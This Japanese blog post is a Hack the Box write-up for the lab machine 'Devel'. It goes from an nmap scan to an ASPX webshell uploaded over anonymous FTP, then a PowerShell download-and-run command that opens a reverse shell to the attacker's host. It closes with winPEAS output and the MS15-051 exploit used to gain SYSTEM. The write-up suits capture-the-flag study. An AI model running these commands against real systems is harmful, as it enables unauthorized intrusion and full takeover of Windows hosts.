This page looks best with JavaScript enabled

【Hack the Box write-up】Devel

 ·   ·  ☕ 3 min read  ·  ✍️ さんぽし

はじめに

筆者は Hack the Box 初心者です。
何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。
さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。
github | sanposhiho/MY_CHEAT_SHEET

machineについて

難易度は easy です

スクリーンショット 2020-06-14 2.55.19.png

nmap

kali@kali:~$ nmap -sC -sV 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 10:47 EDT
Nmap scan report for 10.10.10.5
Host is up (0.26s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.69 seconds

80 番はこんな感じ

スクリーンショット 2020-06-14 0.10.57.png

ftpでupload

ftp が anonymous login できるので見てみます

kali@kali:~$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

んー

ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
12 bytes sent in 0.00 secs (202.0474 kB/s)

スクリーンショット 2020-06-14 1.30.29.png

:naruhodo:ですね
upload したものにそのままアクセスできそう

webshell を上げます

ftp> put /usr/share/davtest/backdoors/aspx_cmd.aspx aspx_cmd.aspx
local: /usr/share/davtest/backdoors/aspx_cmd.aspx remote: aspx_cmd.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1438 bytes sent in 0.00 secs (899.0377 kB/s)

スクリーンショット 2020-06-14 1.52.38.png

shell とる

Invoke-PowerShellTcp で reverse shell をとります

https://github.com/sanposhiho/MY_CHEAT_SHEET/blob/master/Windows/Invoke-PowerShellTcp.md

powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 1212
kali@kali:~$ wget https://raw.githubusercontent.com/samratashok/nishang/c3fdf5e5dfa8612d0a17636dbb096b04e987ab31/Shells/Invoke-PowerShellTcp.ps1
--2020-06-13 12:56:30--  https://raw.githubusercontent.com/samratashok/nishang/c3fdf5e5dfa8612d0a17636dbb096b04e987ab31/Shells/Invoke-PowerShellTcp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4339 (4.2K) [text/plain]
Saving to: ‘Invoke-PowerShellTcp.ps1’

Invoke-PowerShellTcp.ps1                                   100%[=======================================================================================================================================>]   4.24K  --.-KB/s    in 0s      

2020-06-13 12:56:30 (12.4 MB/s) - ‘Invoke-PowerShellTcp.ps1’ saved [4339/4339]

kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.5] 49168
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>


取れました

winPEAS

PS C:\Windows\Temp> ./winPEAS.bat

            *((,.,/((((((((((((((((((((/,  */               
     ,/*,..*(((((((((((((((((((((((((((((((((,           
   ,*/((((((((((((((((((/,  .*//((//**, .*((((((*       
   ((((((((((((((((* *****,,,/########## .(* ,((((((   
   (((((((((((/* ******************/####### .(. ((((((
   ((((((..******************/@@@@@/***/######* /((((((
   ,,..**********************@@@@@@@@@@(***,#### ../(((((
   , ,**********************#@@@@@#@@@@*********##((/ /((((
   ..(((##########*********/#@@@@@@@@@/*************,,..((((
   .(((################(/******/@@@@@#****************.. /((
   .((########################(/************************..*(
   .((#############################(/********************.,(
   .((##################################(/***************..(
   .((######################################(************..(
   .((######(,.***.,(###################(..***(/*********..(
  .((######*(#####((##################((######/(********..(
   .((##################(/**********(################(**...(
   .(((####################/*******(###################.((((  
   .(((((############################################/  /((
   ..(((((#########################################(..(((((.
   ....(((((#####################################( .((((((.
   ......(((((#################################( .(((((((.
   (((((((((. ,(############################(../(((((((((.
       (((((((((/,  ,####################(/..((((((((((.
             (((((((((/,.  ,*//////*,. ./(((((((((((.
                (((((((((((((((((((((((((((/"
                       by carlospolop
ECHO is off.
Advisory: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
ECHO is off.
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] BASIC SYSTEM INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WINDOWS OS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check for vulnerabilities for the OS version with the applied patches
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ??
System Boot Time:          17/6/2020, 1:44:45 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 704 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.496 MB
Virtual Memory: In Use:    551 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5








"Microsoft Windows 7 Enterprise   " 
[i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat)
MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys)
MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri)
MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo)
MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys)
MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free)
MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS)
MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager)
MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX)
MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP)
MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei)
MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu)

PE

MS15-051 使います
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051

smbshare.py で飛ばして〜

kali@kali:~/windows-kernel-exploits/MS15-051/MS15-051-KB3045171$ sudo python /home/kali/impacket/examples/smbserver.py share .

さっき webshell で実行したのをポートだけ変えて実行します

PS C:\Windows\Temp> copy \\10.10.14.8\share\ms15-051.exe C:\Windows\Temp
PS C:\Windows\Temp> .\ms15-051.exe "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 1313"

kali@kali:~$ nc -lnvp 1313
listening on [any] 1313 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.5] 49176
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\Temp>whoami
nt authority\system

PE できました

終わりに

ベーシックなマシンでした!

Share on

さんぽし
WRITTEN BY
さんぽし
Web Developer /w Elixir, Go